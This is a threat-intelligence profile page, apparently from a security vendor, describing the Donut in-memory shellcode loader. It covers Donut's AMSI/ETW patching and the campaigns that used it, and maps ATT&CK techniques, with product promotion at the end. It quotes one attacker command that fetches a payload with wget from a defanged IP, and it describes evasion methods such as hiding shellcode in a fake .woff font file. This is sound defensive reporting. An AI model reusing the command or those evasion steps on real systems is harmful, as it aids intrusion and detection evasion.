Donut
Donut is an open-source shellcode generation and in-memory loader framework for Windows payloads. It generates position-independent shellcode that can load and execute .NET assemblies, PE files, EXEs, DLLs, and scripts such as VBScript and JScript/JavaScript directly from memory, including outputs usable via PowerShell and Ruby. Donut is designed for fileless or memory-resident execution and has been observed allocating executable memory, reflectively loading embedded payloads, manually mapping final PE payloads, and in some cases supporting staged delivery with HTTP request/response logic to retrieve additional payloads. Reported defense-evasion features include patching AMSI, WLDP, and sometimes ETW in-process, patching exit-related Native API functions to avoid process termination, and erasing in-memory file references to payloads after reflective loading. Donut uses the Chaskey block cipher/CTR mode as part of payload protection. It also includes a DonutTest subproject for injecting shellcode into a target process.
Across the provided reporting, Donut is used as a loader component rather than the final malware family. It has been observed in multiple intrusion chains: Rapid7 reported Dropping Elephant using a malicious LNK, PowerShell staging, scheduled task persistence, and DLL side-loading via Fondue.exe and APPWIZ.cpl to decrypt an AES-256-CBC protected blob from editor.dat, execute Donut shellcode, patch AMSI/WLDP/ETW, and in-memory load a final 32-bit RAT communicating with gcl-power.org; BI.ZONE reported Fluffy Wolf using Rust-based loaders running Donut shellcode to deliver payloads including Pay2Key, PureLogs, and PureRAT into processes such as RegAsm.exe, InstallUtil.exe, and MSBuild.exe against Russian organizations in construction, consulting, manufacturing, engineering, retail, and e-commerce; Sophos observed Chinese state-directed Operation Crimson Palace increasingly using Donut loaders alongside Havoc, Cobalt Strike, XieBroC2, ExecIT, Alcatraz, and RealBlindingEDR in attacks on Southeast Asian government and public-service organizations, including Donut-based injection of Havoc or Cobalt Strike into svchost.exe; Gurucul described a ClickFix campaign using canndelta.com, malicious PowerShell, Donut shellcode, RWX memory allocation, and in-memory .NET loading to deliver PureLogs; Cato reported a TencShell intrusion against a global manufacturing company in which a first-stage dropper fetched a disguised .woff file containing Donut shellcode that reflectively loaded the final implant; Sophos also documented AI-themed malware delivery via claude-pro.com where DLL sideloading decrypted Donut shellcode that loaded the Beagle backdoor; and Securonix described SERPENTINE#CLOUD using Donut as a recurring bridge between Python loaders and final .NET RATs such as PureLogs, AsyncRAT, VenomRAT, Violet RAT, DcRat, PureHVNC, and XWorm.
High-confidence indicators directly tied to Donut in the content are primarily behavioral rather than static: in-memory execution of Windows payloads; RWX or executable memory allocation; reflective/manual mapping of embedded PE or .NET payloads; AMSI/WLDP and sometimes ETW patching; Chaskey-protected embedded payloads; staged HTTP retrieval in configured variants; and shellcode execution/injection via helper tooling such as DonutTest. The content does not provide a single canonical actor attribution for Donut itself because it is an open-source tool reused by multiple threat actors and campaigns.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
9 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The loader decrypts an AES-wrapped payload stored on disk. The decrypted payload contains a Donut shellcode loader that embeds the final RAT and uses Chaskey block cipher as part of its payload protection scheme. Donut then decrypts the final 32-bit native RAT, maps it, and executes it in memory.
While they still leverage classic droppers like PureCrypter and Rust-based loaders running Donut shellcode, they have added a potent new tool to their arsenal: PowerLoader.
Donut is an opensource position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files, and dotNET assemblies. In this attack, Donut is used to decrypt and execute the Atlantida stealer inside RegAsm.exe process memory.
This decrypted payload is Donut (aka DonutLoader, aka donut_injector) shellcode – an open-source, in-memory loader.
The decrypted shellcode is a Donut loader -- a framework for generating position-independent shellcode from PE files, .NET assemblies, and other executable formats.
We decrypted these and found new malware, including DaveShell and Donut loader, which are two open source loaders being observed for first time in Tropic Trooper activity.
Techniques & procedures
21 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
6 techniques
Execution
APT19 downloaded and launched code within a SCT file; APT32 used COM scriptlets to download Cobalt Strike beacons; APT37 used Ruby scripts to execute payloads; ArcaneDoor included the adversary executing command line interface (CLI) commands.
This research analyzes a ClickFix campaign leveraging the spoofed licensing-themed website canndelta.com to deliver the PureLogs stealer through malicious PowerShell commands.
Inside that file was Donut shellcode, an open-source tool capable of loading Windows payloads directly in memory
AppleSeed has the ability to use JavaScript to execute PowerShell. APT32 has used JavaScript for drive-by downloads and C2 communications. Astaroth uses JavaScript to perform its core functionalities.
Privilege Escalation
1 technique
Privilege Escalation
Stealth
10 techniques
Stealth
The content repeatedly describes payloads, strings, configuration files, scripts, URLs, and binaries being obfuscated or encoded using Base64, XOR, RC4, AES, RSA, hex encoding, custom algorithms, and other methods across many malware families and threat actors.
The dropper then retrieved what appeared to be a standard web font file with a .woff extension, the kind websites routinely use to load custom typefaces. Inside that file was Donut shellcode
The next stage involved retrieving Donut shellcode through a masqueraded .woff resource... By placing malicious content behind a font-looking path or extension, the attacker makes the payload request appear like a routine static web asset.
using a custom malware loader called HUI loader to inject a Cobalt Strike beacon into the Remote Desktop utility mstsc.exe... the attackers used the Havoc tool to inject code into other processes
The sideloaded DLL decrypts the encrypted payload in NOVupdate.exe.dat by reversing it and XORing it with the key... The malware then executes the decrypted shellcode
Ironically, the actors used a malware protection product to execute the EDR killer to create an execution chain that would appear to be “safe” to other malware protection tools... leveraging kaba.exe, a renamed version of a legitimate Kaspersky executable
They also used anti-analysis methods, which suggests a “codebase continuity rather than a short-lived ‘smash-and-grab’ campaign.”
Credential Access
1 technique
Credential Access
Discovery
2 techniques
Discovery
Command and Control
2 techniques
Command and Control
The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.
Examples include: "APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits," "During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads," and multiple malware families "use HTTP GET requests" or similar to download files/payloads.
IOCs tracked for this family
67 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
68 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Donut is used as an in-memory shellcode loader that decrypts and maps the final RAT into memory without writing it to disk, while also patching AMSI, WLDP, and ETW in-process to reduce detection.
Shellcode used with Rust-based loaders as part of Fluffy Wolf delivery chains.
Donut is used in this campaign as shellcode to enable fileless execution and in-memory .NET assembly loading, helping evade detection during delivery of the PureLogs stealer.
Donut is an open-source in-memory shellcode loader used in the attack chain to load Windows payloads reflectively into memory without writing them to disk, enabling stealthy execution of TencShell.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.